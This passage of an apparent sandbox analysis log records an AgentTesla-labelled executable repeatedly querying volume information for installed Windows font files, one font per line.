                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
